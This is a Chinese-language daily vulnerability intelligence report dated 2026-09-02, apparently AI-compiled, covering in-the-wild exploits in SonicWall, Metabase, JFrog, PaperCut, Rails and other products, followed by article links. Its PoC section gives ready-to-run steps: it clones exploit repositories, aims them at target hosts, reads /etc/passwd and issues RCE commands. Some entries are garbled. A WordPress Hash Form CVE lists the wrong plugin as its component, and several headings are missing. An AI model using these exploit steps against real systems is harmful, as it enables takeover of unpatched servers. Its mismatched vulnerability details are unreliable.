每日安全情报报告 · 2026-09-02

每日安全情报报告 · 2026-09-02

由 AI 整理发布

本报告聚焦 2026-08-31 ~ 2026-09-02(近 24--48 小时) 新增及在野利用的高危漏洞、公开 PoC 与权威安全文章。所有外部链接均为可点击的 Markdown 链接,请优先处置标注 🔴 的在野利用 / CISA KEV 项。


一、本期高风险速览

风险级别 编号 组件 CVSS 状态 链接
🔴 CVE-2026-83548 SonicWall SMA1000(SSRF) 10.0 在野利用 NVD 详情
🔴 CVE-2026-72898 Metabase(SQL 注入→管理员接管) 10.0 CISA KEV·在野 NVD 详情
🔴 CVE-2026-82329 JFrog Artifactory(认证绕过→管理员) 9.8 在野利用 NVD 详情
🔴 CVE-2026-0768 Langflow(代码注入 RCE) 9.8 在野利用 NVD 详情
🔴 CVE-2026-66066 Ruby on Rails(KindaRails2Shell) 9.5 在野利用 NVD 详情
🔴 CVE-2026-81578 / CVE-2026-82078 PaperCut NG/MF(认证绕过+不安全类加载) 8.8 / 9.4 CISA KEV·在野 NVD 详情
🔴 CVE-2026-9586 Sangoma Switchvox(SQLi→RCE) 高危 在野利用 Brinztech 警报
🟠 CVE-2026-81780 WordPress Hash Form(任意文件上传 RCE) 10.0 公开 PoC NVD 详情
🟠 CVE-2026-82970 WordPress WP Cookie Notice(任意文件上传 RCE) 10.0 新增 Tenable 详情
🟠 CVE-2026-82688 / CVE-2026-82691 D-Link ShareCenter(命令注入 RCE) 高危 EOL·公开 PoC ThreatAft 分析
🟠 CVE-2026-83772 Cobham SATCOM VSAT7090(命令注入) 9.9 公开武器化利用 NVD 详情
🟠 CVE-2026-82971 QVidium Opera11(CGI 命令注入 RCE) 10.0 EOL·无补丁·公开 PoC NVD 详情
🟠 CVE-2026-74233 Zbtlink / OEM 路由器(infosrvd 命令注入) 9.8 公开 PoC·无补丁 NVD 详情
🟠 CVE-2026-58138 Orkes Conductor(未认证 RCE) 9.8 已观测利用 Empirical 分析

二、最新高危漏洞

2.1 🔴 在野利用 / CISA KEV(最高优先处置)

CVE-2026-83548 --- SonicWall SMA1000 预认证 SSRF(CVSS 10.0)
  • 漏洞类型:服务端请求伪造(SSRF,CWE-918 / CWE-441)
  • 受影响组件:SonicWall SMA1000 系列(SMA 6210 / 7210 / 8200v),固件 ≤ 12.4.3-03453、≤ 12.5.0-02835
  • CVSS:10.0(Critical)
  • 在野利用 :✅ SonicWall PSIRT 于 2026-09-01 确认在野利用,与 CVE-2026-83549 组合可形成完整攻击链
  • 修复版本:12.4.3-03526 / 12.5.0-02952(hotfix)
  • 链接SonicWall 官方公告 SNWLID-2026-0016 · Beazley 分析 · NVD 详情
CVE-2026-83549 --- SonicWall SMA1000 AMC OS 命令注入(CVSS 7.8)
  • 漏洞类型:OS 命令注入(CWE-78),需管理员认证
  • 受影响组件:SMA1000 Appliance Management Console(AMC)
  • 在野利用:✅ 与 CVE-2026-83548 一并确认在野
  • 链接NVD 详情
CVE-2026-72898 --- Metabase 未认证 SQL 注入→管理员接管(CVSS 10.0)
  • 漏洞类型 :SQL 注入(CWE-89),位于 /api/session/reset_password 端点,通过 user-id 字段注入 HoneySQL raw 载荷
  • 受影响组件:Metabase 0.58.0 ~ 0.63.4(Enterprise 1.58.x ~ 1.63.x),即 1.58 及以上
  • CVSS:10.0(Critical)
  • 在野利用:✅ CISA KEV(2026-08-11 新增,联邦整改截止 2026-08-14);Metabase Cloud 自身遭入侵,已波及 Framework、n8n、Kilo Code、Tixel 等多家企业
  • 修复版本:0.58.24 / 0.59.21 / 0.60.17 / 0.61.11 / 0.62.9 / 0.63.5 及以上
  • 链接NVD 详情 · Metabase 安全公告 GHSA-vwf4-m7j8-wcjf · 事件报道
CVE-2026-82329 --- JFrog Artifactory 认证绕过→管理员令牌(CVSS 9.8)
  • 漏洞类型:认证缺陷(CWE-287),默认配置下未认证攻击者伪造集群 join JWT 获取管理员令牌
  • 受影响组件:JFrog Artifactory < 7.111.21、7.117.x < 7.117.28、7.125.x < 7.125.20、7.133.x < 7.133.29、7.146.x < 7.146.38、7.161.x < 7.161.20
  • CVSS:9.8(Critical)
  • 在野利用:✅ 披露(2026-08-28)后数日内即遭在野利用,可投毒软件供应链
  • 链接NVD 详情 · JFrog 安全公告 · THN 报道
CVE-2026-0768 --- Langflow 代码注入 RCE(CVSS 9.8)
  • 漏洞类型 :代码注入(CWE-94),/api/v1/validate_code 端点未对用户输入做沙箱处理直接 exec
  • 受影响组件:Langflow ≤ 1.4.2(建议升级至 1.11.6)
  • CVSS:9.8(Critical)
  • 在野利用:✅ VulnCheck 英国蜜罐自 2026-09-01 起观测到 360+ 次利用尝试(多源自俄罗斯),用于窃取 AWS / OpenAI / Langflow 超级用户密钥
  • 链接NVD 详情 · VulnCheck 通告 · Zeroday.news 报道
CVE-2026-66066 --- Ruby on Rails KindaRails2Shell 任意文件读→RCE(CVSS 9.5)
  • 漏洞类型:文件类型混淆导致的任意文件读(CWE),链式 RCE;影响使用 libvips 处理 Active Storage 图片上传的应用
  • 受影响组件:Active Storage < 7.2.3.2、8.0.x < 8.0.5.1、8.1.x < 8.1.3.1(需 libvips ≥ 8.13)
  • CVSS:9.5(Critical)
  • 在野利用:✅ VulnCheck 于 2026-08-25 起确认在野,约 7,000 个公网 Rails 实例受影响;注意:补丁仅封堵 libvips 文件读路径,Marshal 反序列化 RCE 支路在已获取签名时仍可利用
  • 链接NVD 详情 · SecurityWeek 报道 · Rails 取证指引
CVE-2026-81578 + CVE-2026-82078 --- PaperCut NG/MF 认证绕过 + 不安全类加载(CVSS 8.8 / 9.4)
  • 漏洞类型:CWE-305 访问控制缺陷 + CWE-470 不安全反射;二者可链式形成未认证 RCE(以 SYSTEM / root 运行)
  • 受影响组件:PaperCut MF/NG 全版本,修复边界 24.1.10 / 25.0.13 / 26.0.5(Emergency Patch Release 2)
  • 在野利用:✅ CISA KEV(2026-08-31 新增,截止 2026-09-14);Huntress 在两个客户环境复现完整预认证 RCE 链;约 47% 实例仍运行 v23 或更早(无补丁)
  • 链接NVD CVE-2026-81578 · NVD CVE-2026-82078 · PaperCut 安全公告 · Huntress 复现报道
CVE-2026-9586 --- Sangoma Switchvox SQLi→RCE(在野利用)
  • 漏洞类型:SQL 注入→root 级 RCE(认证绕过)
  • 受影响组件:Sangoma Switchvox 统一通信 / PBX 设备
  • 在野利用:✅ 2026-08-30 起蜜罐观测自动化扫描与利用,2026-09-01 技术细节与 PoC 公开
  • 链接Brinztech 警报
其他持续在野(历史 KEV,本期仍需跟踪)
  • CVE-2026-60004 Gitea diffpatch RCE(CVSS 9.8,KEV,8,300+ 未修)--- NVD 详情
  • CVE-2026-64849 MLflow SSRF 窃云凭据(CVSS 高危,KEV 整改截止 今日 2026-09-02 )--- NVD 详情
  • CVE-2026-18885 / CVE-2026-18886 / CVE-2026-74820 ServiceNow AI Platform 三连击(均为 CVSS 10.0 免认证代码注入 / 越权 / SQLi)--- THN 报道

2.2 🟠 近 24--48 小时新增高危(待验证利用,建议尽快修补)

CVE-2026-81780 --- WordPress Hash Form 未认证任意文件上传(CVSS 10.0)
  • 漏洞类型:任意文件上传(CWE-434)→ RCE
  • 受影响组件:WP Cookie Notice for GDPR, CCPA & ePrivacy Consent(gdpr-cookie-consent)≤ 4.4.1
  • 链接Tenable 详情 · Patchstack 数据库
  • 漏洞类型:OS 命令注入(CWE-77),已认证远程命令执行
  • 受影响组件:D-Link ShareCenter NAS(已停产,无补丁)
  • 公开 PoC:已披露
  • 链接ThreatAft 分析 · CIRCL CVE-2026-82688
CVE-2026-83772 --- Cobham SATCOM VSAT7090 命令注入(CVSS 9.9)
  • 漏洞类型 :命令注入(CWE-77),mail-report.shsender/recipients 参数
  • 受影响组件:Cobham SATCOM VSAT7090 海事卫星路由器 ≤ 20260704
  • 公开武器化利用:✅ 厂商未响应,无官方补丁
  • 链接NVD 详情 · Brinztech 警报 · VulDB VDB-397501
CVE-2026-82971 --- QVidium Opera11 CGI 命令注入 RCE(CVSS 10.0,EOL 无补丁)
  • 漏洞类型 :OS 命令注入(CWE-77),/cgi-bin/net_tr.cgiipaddr 参数
  • 受影响组件:QVidium Opera11 固件 3.3.2a26-Ax4x-opera11
  • 公开 PoC :✅ 已披露;厂商已停业,永无补丁
  • 链接NVD 详情 · ThreatAft 分析 · VulDB VDB-397334
  • 漏洞类型:OS 命令注入(CWE-78)+ 硬编码密钥(CWE-321),UDP/9992 未认证
  • 受影响组件:Zbtlink WE1326/WE357/WE5926 等多款及 OEM 白标设备(CTN720-W1、LF-1541、MT7620N、WRC1 等)
  • 公开 PoC:✅ 已存在(GHSA-2h7p-q23r-5gcf)
  • 缓解:在网络边界封禁 UDP/9992;无厂商修复固件
  • 链接NVD 详情 · VulnCheck 博客 · Armis 情报
CVE-2026-58138 --- Orkes Conductor 未认证 RCE(CVSS 9.8)
  • 漏洞类型 :未认证 RCE,INLINE/LAMBDA/DO_WHILE/SWITCH 任务经 GraalVM HostAccess.ALL 执行任意 OS 命令
  • 受影响组件:Orkes Conductor 3.21.21 < 3.30.2(开源版默认无认证)
  • 利用情况:✅ Empirical 遥测显示近 7 日内在野(最近 2026-08-21);Exploit-DB 已有利用代码
  • 链接Empirical 月度 CVE 分析 · Exploit-DB 52633

三、最新漏洞 PoC(含使用步骤)

⚠️ 以下 PoC 仅限授权测试环境使用。运行前务必审阅源码,避免对生产/第三方系统造成未授权影响。

1. Metabase CVE-2026-72898(未认证 SQLi → 管理员会话伪造)

bash 复制代码
# 1. 克隆仓库
git clone https://github.com/0xBlackash/CVE-2026-72898.git
cd CVE-2026-72898
# 2. 安装依赖
pip install requests
# 3. 运行(非侵入式检测 + 会话伪造)
python3 exploit.py --url http://TARGET:3000
# 说明:STEP 2 返回 HTTP 400 为预期(token 无效,但堆叠 INSERT 已执行);
#       以伪造 Cookie 请求 /api/user/current 返回 200 即接管成功

2. PaperCut NG/MF CVE-2026-81578 / CVE-2026-82078(认证绕过 + 不安全类加载)

bash 复制代码
git clone https://github.com/yora1928/PaperCut-CVE-2026-81578-82078.git
cd PaperCut-CVE-2026-81578-82078
pip install requests rich
# 资产扫描 / 版本指纹
python3 papercut.py scan --target http://TARGET:9191
# 漏洞自检(loopback 概念验证)
python3 papercut.py exploit --target http://TARGET:9191 --cmd "ipconfig"

3. Ruby on Rails KindaRails2Shell CVE-2026-66066(任意文件读 → RCE)

bash 复制代码
git clone https://github.com/0xsha/KindaRails2Shell.git
cd KindaRails2Shell
pip install requests
# 仅做文件读取探测(非侵入)
python3 kindarails2shell.py --url http://TARGET --read /etc/passwd
# 完整 RCE 请仅在授权环境运行
# python3 kindarails2shell.py --url http://TARGET --rce "id"

4. JFrog Artifactory CVE-2026-82329(未认证认证绕过 → 管理员令牌)

  • 来源Sploitus: dinosn PoC(含可复现 Docker 实验室 + URL 参数化校验脚本)
  • 步骤
bash 复制代码
# 拉取 PoC 仓库(Sploitus 页面内附 git 地址,按页面说明克隆)
git clone <dinosn_CVE-2026-82329_repo> && cd CVE-2026-82329
pip install requests
# 验证目标是否可被未认证获取 ADMIN(默认端口 8082)
python3 poc/cve_2026_82329_poc.py http://TARGET:8082
# 成功特征:/registry/join → 201,/access/api/v1/tokens → 200 ADMIN token

5. Orkes Conductor CVE-2026-58138(未认证 RCE)

  • 来源Exploit-DB 52633(OrkesConductor 3.30.2 - Unauthenticated RCE)
  • 步骤
bash 复制代码
# 通过 searchsploit 获取
searchsploit OrkesConductor 3.30.2
# 或访问 Exploit-DB 下载对应利用脚本后:
python3 52633.py http://TARGET:8080
# 原理:向 /api/workflow 提交含恶意 INLINE 任务的 workflow 定义,经 GraalVM 逃逸执行系统命令
bash 复制代码
# 向目标 UDP/9992 发送特制数据包触发 root 命令执行(概念验证)
# 仅授权测试环境执行;生产环境建议直接在网络边界 DROP UDP/9992
# 利用示例(伪代码,需按 VulnCheck 博客实现):
#   send_udp(TARGET, 9992, b"<crafted infosrvd packet with shell metachars>")

7. 暂无公开 PoC 的项(厂商已确认在野,需重点监控)

  • SonicWall SMA1000 CVE-2026-83548 / CVE-2026-83549 :截至本报告,Beazley 确认无公开 PoC ,但厂商已确认在野。建议立即打 hotfix 并排查 AMC 异常管理员活动 --- SonicWall 公告
  • Cobham SATCOM CVE-2026-83772 / QVidium CVE-2026-82971 :厂商未响应,仅第三方(VulDB / ThreatAft)披露利用线索,设备建议立即下线或隔离 --- VulDB VDB-397501 · VulDB VDB-397334

四、网络安全最新文章

  1. SonicWall SMA 1000 系列两漏洞在野利用(CVE-2026-83548 / 83549) --- Beazley Security Labs 详细分析攻击链与缓解措施。阅读原文
  2. PaperCut NG/MF 被加入 CISA KEV,确认在野 --- Huntress 复现完整预认证 RCE 链,约 47% 实例运行无补丁的旧版本。阅读原文
  3. Langflow 关键 RCE 遭在野利用,VulnCheck 观测 360+ 次尝试 --- 攻击者窃取 AWS / OpenAI / Langflow 密钥。阅读原文
  4. Ruby on Rails KindaRails2Shell 被利用,补丁仍留 RCE 支路 --- SecurityWeek 报道 VulnCheck 发现补丁未完全中和 Marshal 反序列化。阅读原文
  5. Metabase 零日致多家企业数据泄露(Framework / n8n / Tixel) --- CVE-2026-72898 通过重置密码端点接管管理员。阅读原文
  6. ServiceNow AI Platform 三个 CVSS 10.0 漏洞(CVE-2026-18885 等) --- THN 汇总 McKesson 2.84 亿条记录泄露等重大事件。阅读原文
  7. 2026-09-01 网络安全日报(DanSec) --- 涵盖柏林勒索软件、医疗数据泄露、PaperCut/Sangoma/Langflow/Rails 在野利用全景。阅读原文
  8. Enigma 每日威胁情报摘要 2026-09-01 --- 聚焦 WordPress 插件 CVSS 10.0、Fire Ant 中国关联 APT、医疗行业攻击。阅读原文
  9. Cobham SATCOM VSAT7090 命令注入漏洞披露(CVE-2026-83772) --- Brinztech 警告海事卫星通信基础设施面临武器化利用。阅读原文
  10. Sangoma Switchvox SQLi→RCE 在野利用(CVE-2026-9586) --- 技术细节与 PoC 于 9/1 公开后自动化利用激增。阅读原文
  11. Orkes Conductor CVE-2026-58138:被忽视的 9.8 分未认证 RCE --- Empirical Security 月度 CVE,遥测显示已在野。阅读原文
  12. BestSec 2026-09-01 安全日报 --- 汇总 Aurora 勒索软件武器化 AI、Claude Code 合规 API、Rails 漏洞等。阅读原文

部分内容由 AI 辅助生成

相关推荐
0xBADCODE1 小时前
CTF Writeup 合集
安全·web安全·网络安全·系统安全·密码学·php·ctf
数据知道3 小时前
恶意软件分析实验室搭建——沙箱、快照、网络隔离
网络·安全·web安全·网络安全
Lust Dusk6 小时前
【最新】VMware虚拟机下载安装教程
网络·网络安全·系统安全
马立杰8 小时前
IE241209_路由安全技术(三层安全)
安全·网络安全
Sagittarius_A*8 小时前
【好靶场】SQL 注入-布尔盲注-2
sql·web安全·网络安全·sql注入
Shi-p10 小时前
TrapCloud 全网攻击感知平台:基于蜜罐诱捕实现公网主动防御
网络安全·威胁分析·蜜罐·trapcloud
芯盾时代1 天前
《金融业网络安全管理办法(征求意见稿)》全条款深度拆解(三)
网络·安全·网络安全
00后程序员张1 天前
Android证书绑定抓包失败?Android SSL Pinning绕过实战指南
android·网络协议·计算机网络·网络安全·adb·https·ssl
菩提小狗1 天前
每日安全情报报告 · 2026-09-01
网络安全·漏洞·cve·安全情报·每日安全